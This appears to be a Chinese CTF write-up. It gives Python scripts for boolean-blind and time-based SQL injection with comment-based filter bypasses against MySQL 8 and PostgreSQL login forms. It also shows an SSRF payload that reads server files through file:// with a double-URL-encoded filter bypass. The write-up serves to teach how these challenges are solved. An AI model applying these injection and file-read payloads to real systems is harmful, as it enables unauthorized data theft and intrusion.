ccc 太菜了!!!

web

ezsql

fuzz一下过滤了

1
空格 select union ; if

写脚本bool盲注:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests

url = 'http://139.129.98.9:30003/login.php'
flag=''
proxies={
"http":"127.0.0.1:8080"
}
for i in range(1,50):
f1=flag
top=127
low=33
while low<=top:
mid=(top+low)//2
# case/**/when/**/ord(substr((password)/**/from/**/{}/**/for/**/1))>{}/**/then/**/1/**/else/**/0/**/end
# 1'||(0)='1 (case/**/when/**/(ord(substr((password)/**/from/**/{}/**/for/**/1))/**/in/**/({}))/**/then/**/1/**/else/**/0/**/end)
data1 = {"username": "1'||(case/**/when/**/(ord(substr((table/**/`f11114g`/**/limit/**/1,1)/**/from/**/{}/**/for/**/1))/**/in/**/({}))/**/then/**/1/**/else/**/0/**/end)='1".format(str(i),str(mid)), "password": "123"}
data2 = {"username": "1'||(case/**/when/**/ord(substr((table/**/`f11114g`/**/limit/**/1,1)/**/from/**/{}/**/for/**/1))>{}/**/then/**/1/**/else/**/0/**/end)='1".format(str(i),str(mid)), "password": "123"}
try:
print(i,mid)
r1=requests.post(url, data=data1,proxies=proxies)
if 'password error!' in r1.text:
flag+=chr(mid)
print(flag)
break
r2=requests.post(url, data=data2,proxies=proxies)
if 'password error!' in r2.text:
low=mid+1
else:
top=mid-1
except Exception as e:
print(e)
if flag==f1:
break
print(flag)

# 8.0.22-0ubuntu0.20.04.2
# ctf
# gml666 b4bc4c343ed120df3bff56d586e6d617

注出密码登陆发现没flag ccc mysql版本为8 想到了之前在p神星球看到的trick

写exp 这个脚本最后一位要改下 位置加1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests

url = 'http://139.129.98.9:30003/login.php'
flag=''
proxies={
"http":"127.0.0.1:8080"
}
index=0
s='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
for i in range(1,50):
f1=flag
for j in s:
data = {"username": "1'||(case/**/when(('def','ctf','{}',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null)<(table/**/`information_schema`.`tables`/**/order/**/by/**/15/**/desc/**/limit/**/{},1))/**/then/**/1/**/else/**/0/**/end)='1".format(flag+j,str(index)), "password": "123"}
try:
print(i,j)
r1=requests.post(url, data=data,proxies=proxies)
if 'password error!' not in r1.text:
flag+=s[s.index(j)-1]
print(flag)
break
except Exception as e:
print(e)
if flag==f1:
break
print(flag)
# `information_schema`.`tables`有21列 第15列为CREATE_TIME字段即创建时间根据这个排序就能把题目创建的表排在前面

你能登陆成功吗

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import string
burp0_url = "http://139.129.98.9:30005/"
burp0_cookies = {"sidebarStatus": "1"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://139.129.98.9:30005", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4343.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://139.129.98.9:30005/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

dic = string.ascii_letters + string.digits
flag = ''
for index in range(50):
print(index)
for i in dic:
burp0_json={"password": "a'||case/**/when/**/password=overlay(password/**/placing/**/'{}'/**/from/**/{})/**/then/**/pg_sleep(3)/**/else/**/pg_sleep(0)/**/end--".format(i, index), "username": "admin"}
try:
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json, timeout=2)
except Exception as e:
flag += i
print(flag)
break

misc

签到

查看源码发现:/?url=

image-20201205231950119

读源码:

1
?url=file:///var/www/html/index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
echo "<!-- /?url= -->";
if ($_GET['url']) {
if (preg_match("/flag/i", $_GET['url'])) {
die();
}
$curl = curl_init();

curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_TIMEOUT, 500);
curl_setopt($curl, CURLOPT_URL, $_GET['url']);

$res = curl_exec($curl);
curl_close($curl);
echo $res;
}

二次url编码绕过

1
?url=file:///fla%25%36%37

评论